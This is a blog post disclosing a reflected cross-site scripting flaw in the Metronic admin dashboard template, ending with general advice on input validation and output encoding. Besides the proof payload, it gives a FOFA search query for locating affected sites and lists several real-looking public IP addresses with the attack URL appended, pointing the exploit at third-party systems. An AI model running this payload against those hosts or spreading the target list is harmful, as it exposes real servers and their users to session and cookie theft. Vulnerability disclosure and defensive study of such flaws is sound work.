Metronic-XSS

已于 2024-09-04 21:26:31 修改
阅读量2.1k 收藏 14
点赞数 13
CC 4.0 BY-SA版权
文章标签: 前端
于 2024-09-04 21:04:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45744104/article/details/141903463

1、Vulnerability system

        Metronic - Responsive Admin Dashboard Template is a responsive website backend management template based on the Bootstrap framework. As an excellent responsive website backend management template, it has a beautiful interface, powerful features, and perfect mobile device responsiveness. Metronic has a simple and elegant Metro UI style interface, 6 interface colors, 76 template pages, including various components required for backend management projects such as charts, tables, maps, message centers, monitoring panels, etc. It is truly a high-end and functionally compatible responsive website backend management template. This template has reflective XSS.

2、The system interface built using the Metronic template is as follows:

3、There is a reflective XSS on the homepage

POC:/<svg%20onload=alert(123)>

Vulnerability reproduction: Direct browser access to IP+POC

4、Scope of Impact: Impact System 1000+

Browser access:https://fofa.info/result?qbase64=YXBwPSJNRVRST05JQy1BZG1pbi1UaGVtZSIg

Fofa Search:app="METRONIC-Admin-Theme"

5、such as:

http://47.98.55.69:8080/<svg%20onload=alert(123)>
http://101.42.46.89:8080/<svg%20onload=alert(123)>
http://115.29.214.168:8080/<svg%20onload=alert(123)>
http://116.62.147.0:8080/<svg%20onload=alert(123)>
http://124.71.181.91:8080/<svg%20onload=alert(123)>
https://117.50.110.6/<svg%20onload=alert(123)>
.......
6、harm:

Reflective XSS (Cross Site scripting) is a common network security vulnerability where attackers inject malicious scripts into web pages and exploit the user's browser to execute these scripts. The hazards mainly include:

1. Stealing User Information: Attackers can obtain sensitive user information such as cookies, session tokens, etc. through malicious scripts, thereby hijacking user accounts.

2. * * Falsifying requests * *: Attackers can exploit XSS vulnerabilities to forge user requests and perform unauthorized operations, such as transferring funds, modifying account information, etc.

To prevent reflective XSS, developers should take the following measures:

-* * Input verification * *: Strictly verify and filter user input.
-Output Encoding: When outputting user input to a webpage, perform appropriate encoding (such as HTML encoding).

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值